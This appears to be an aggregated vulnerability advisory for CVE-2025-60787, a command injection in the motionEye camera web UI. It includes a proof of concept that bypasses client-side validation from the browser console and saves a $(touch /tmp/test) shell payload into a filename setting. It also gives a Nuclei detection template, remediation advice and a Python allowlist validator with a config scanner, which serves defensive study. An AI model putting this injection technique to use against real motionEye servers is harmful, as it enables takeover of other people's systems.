[webapps] motionEye 0.43.1b4 - RCE
CVE-2025-60787
motionEye 0.43.1b4 contains a command injection vulnerability that allows an unauthenticated attacker to achieve remote code execution through custom configuration values.
Critical · CVSS 9.8

📋 Basic Vulnerability Information
| CVE | CVE-2025-60787 |
|---|---|
| Vulnerability type | Command injection / RCE |
| Affected versions | motionEye 0.43.1b4 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-02-11 |
| Submitter | prabhatverma47 |
| Source | Exploit-DB original post |
🔬 Root Cause
motionEye does not adequately filter or escape user-supplied values during configuration handling, so an attacker can inject shell metacharacters (such as backticks or pipe characters) and have arbitrary system commands executed.
🎯 Attack Scenario
1. The attacker reaches motionEye's administration or configuration interface over HTTP.
2. In a custom configuration field (such as a motion parameter or a command-execution field), the attacker injects a malicious payload, for example a value containing `$(cat /etc/passwd)` or the pipe character `|`.
3. motionEye passes the configuration content to the system shell without sanitizing it, so the payload is executed.
4. The attacker gains command execution on the server with the same privileges as the motionEye process.
💥 Impact
An attacker can remotely execute arbitrary system commands without authorization and take full control of the server, which may lead to data leakage, service disruption, lateral movement and other serious consequences.
⚔️ Original PoC
Because the PoC code attached to the original post was omitted, a step-by-step analysis cannot be given here.
```text
# Exploit PoC: motionEye RCE via client-side validation bypass (safe PoC)
# Filename: motioneye_rce_poc_edb.txt
# Affected Versions: motionEye <= 0.43.1b4
#
# Short description:
# Client-side validation in motionEye's web UI can be bypassed via overriding the JS validation
# function. Arbitrary values (including shell interpolation syntax) can be saved into the
# motion config. When motion is restarted, the motion process interprets the config and
# can execute shell syntax embedded inside configuration values such as "image_file_name".
#
# Safe PoC: creates a harmless file /tmp/test inside container (non-destructive).
#
# Environment setup:
# 1) Start the motionEye docker image:
#    docker run -d --name motioneye -p 9999:8765 ghcr.io/motioneye-project/motioneye:edge
#
# 2) Verify version in logs:
#    docker logs motioneye | grep "motionEye server"
#    Expect: 0.43.1b4 (or <= 0.43.1b4 for vulnerable)
#
# 3) Access web UI:
#    Open http://127.0.0.1:9999
#    Login: admin (blank password in default/edge image)
#
# Reproduction (manual + safe PoC):
# A) Bypass client-side validation in browser console:
#    1) Open browser devtools on the dashboard (F12 / Ctrl+Shift+I).
#    2) In the Console tab paste and run:
#
#       configUiValid = function() { return true; };
#
#    This forces the UI validation function to always return true and allows any value
#    to be accepted by the UI forms.
#
# B) Safe payload (paste this into Settings → Still Images → Image File Name and Apply):
#    $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
#
#    After applying, the PoC triggers creation of /tmp/test inside the motionEye container
#    (the "touch" is executed when motion re-reads the config / motionctl restarts).
#
# C) Verify from host:
#    docker exec -it motioneye ls -la /tmp | grep test
#
# Expected result:
#    /tmp/test exists (created with the permissions of the motion process).
#
# Notes / root cause:
# - UI stores un-sanitized values into camera-*.conf (e.g., picture_filename),
#   which are later parsed by motion and interpreted as filenames – shell meta is executed.
# - Fix: sanitize/whitelist filename characters (example sanitization provided in README).
#
# - Original PoC & writeup: https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter
# - motionEye upstream: https://github.com/motioneye-project/motioneye
# - OSV/GHSA advisories referencing this issue (published May–Oct 2025)
# - NVD entries: CVE-2025-60787
```

🔍 Nuclei Detection Template
The following detection template can be used to determine whether a target is affected. Note that its version matcher only fires on 0.43.1 builds, while the PoC lists every release up to and including 0.43.1b4 as affected, so the extracted version should be compared against the fixed release rather than treated as the sole indicator.
```yaml
id: CVE-2025-60787-detection

info:
  name: motionEye 0.43.1b4 - Detection
  author: prabhatverma47
  severity: high
  description: |
    motionEye is a web frontend for the motion daemon.
    This template detects motionEye instances vulnerable to CVE-2025-60787.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-60787
    - https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter
  classification:
    cve-id: CVE-2025-60787

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "motionEye"
        part: body

      - type: status
        status:
          - 200

      - type: regex
        regex:
          - 'motionEye 0\.43\.1[a-b]?[0-9]*'
        part: body

    extractors:
      - type: regex
        name: version
        part: body
        regex:
          - 'motionEye ([0-9]+\.[0-9]+\.[0-9]+[a-zA-Z0-9]*)'
```

🛡️ Remediation
Upgrade to a patched motionEye release (newer than 0.43.1b4). Interim mitigations include restricting network exposure of the motionEye administration interface, enforcing strict input validation on the server side (the PoC shows the client-side check can be overridden from the browser console), and not passing configuration content to a shell for execution.
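As an added defensive example (not motionEye's code and not the PoC author's sanitization), the following Python implements the two checks the root-cause note and the remediation call for: a server-side allowlist validator for motion filename templates such as `picture_filename`, and a scanner that flags values containing shell syntax that were already written into `camera-*.conf`. The option names other than `picture_filename`, the subset of motion `%` specifiers accepted, and the sample config text are constructed assumptions for this example.

```python
"""
Added example (not motionEye's own code): server-side allowlist validation for
motion filename settings, plus a scanner for camera-*.conf values carrying shell syntax.

Assumptions: FILENAME_OPTIONS beyond picture_filename, the accepted '%X' specifier
form, and SAMPLE_CONF are constructed for this example.
"""
import re
from typing import List, Tuple

# motion config options whose values motion expands as filename templates.
# Constructed list for this example; picture_filename is the one named in the PoC.
FILENAME_OPTIONS = {"picture_filename", "movie_filename",
                    "snapshot_filename", "timelapse_filename"}

# Allowed literal characters: letters, digits, dot, underscore, dash, path separator.
# Deliberately excludes $ ` | ; & < > ( ) { } quotes, backslash and whitespace.
_LITERAL = r"[A-Za-z0-9._/-]"
# A motion conversion specifier is '%' followed by one letter (e.g. %Y %m %d %H %M %S %q).
_SPECIFIER = r"%[A-Za-z]"
_TEMPLATE_RE = re.compile(rf"^(?:{_LITERAL}|{_SPECIFIER})+$")

# Shell syntax that must never reach motion (or any shell) through a filename value.
_SHELL_META_RE = re.compile(r'''[$`|;&<>(){}'"\\\s]''')


def is_safe_filename_template(value: str) -> bool:
    """True only if value is built solely from allowlisted literals and %X specifiers."""
    if not value or len(value) > 255:
        return False
    if ".." in value:
        # Policy choice for this example: keep output inside motion's target directory.
        return False
    return _TEMPLATE_RE.fullmatch(value) is not None


def validate_settings(settings: dict) -> List[str]:
    """Re-validate a settings dict as posted by the UI; return the names of rejected options.

    This runs on the server, so overriding the browser-side validation function
    (as the PoC does) no longer lets arbitrary values reach the config file.
    """
    rejected = []
    for key, value in settings.items():
        if key in FILENAME_OPTIONS and not is_safe_filename_template(str(value)):
            rejected.append(key)
    return rejected


def scan_motion_config(text: str) -> List[Tuple[int, str, str]]:
    """Scan camera-*.conf text; return (line_no, option, value) for values with shell syntax."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        parts = line.split(None, 1)          # motion syntax: "<option> <value>"
        if len(parts) != 2:
            continue
        option, value = parts
        if option in FILENAME_OPTIONS and _SHELL_META_RE.search(value):
            findings.append((line_no, option, value))
    return findings


# Constructed sample config: one benign template and one injected value (the PoC payload).
SAMPLE_CONF = """# camera-1.conf (constructed sample)
camera_name Camera1
picture_filename %Y-%m-%d/%H-%M-%S-%q
movie_filename $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
"""

if __name__ == "__main__":
    print(validate_settings({"picture_filename": "%Y-%m-%d/%H-%M-%S-%q"}))  # []
    print(validate_settings({"movie_filename": "a|b.%Y"}))                  # ['movie_filename']
    for line_no, opt, val in scan_motion_config(SAMPLE_CONF):
        print(f"line {line_no}: {opt} = {val!r}")
```

The validator is an allowlist rather than a blocklist: anything that is not a plain filename character or a `%`-letter specifier is rejected, so new shell tricks do not need to be anticipated one by one. The scanner is the corresponding detection step for hosts that ran a vulnerable version, since a value saved before the fix stays in `camera-*.conf` and is re-interpreted every time motion restarts.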
📎 References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60787
- https://www.exploit-db.com/exploits/52079
- Exploit-DB original post
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 06:44 | Source: Exploit-DB